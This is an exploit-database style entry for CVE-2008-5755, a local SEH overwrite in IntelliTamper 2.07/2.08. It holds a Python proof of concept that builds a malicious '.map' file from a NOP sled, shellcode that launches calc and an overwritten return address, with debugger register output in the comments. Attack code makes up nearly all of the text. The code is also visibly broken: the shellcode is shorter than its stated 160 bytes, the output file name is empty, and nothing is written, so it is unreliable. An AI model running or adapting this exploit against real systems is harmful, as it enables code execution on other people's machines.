IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)

Related Vulnerabilities: CVE-2008-5755  
Publish Date: 28 Dec 2008
Author: Cnaph
# IntelliTamper 2.07/2.08  (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <>
# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :

import sys
map_theader = ((("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"
                 "\x4C\x49\x54\x41\x4D\x50\x45\x52\x0D\x0A"))) #junk

map_iheader = "\x46\x49\x4C\x45\x23\x23"

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
shellcode = ((("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
               "\x9a\xf9\x59\x9e\x4f\x9f\x96\x9f\x22\xf2\xa0\x0c\xa6\x91\xc1\x60"))); # 160 byte

header_nop = "\x90"*327

retn = "\x7b\x34\x12\x00"+".html\n" # EIP value with 4 byte fix

exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("", "w")

print "\nFile created successfully !";
print "\n\cN4phux.";

# [2008-12-28]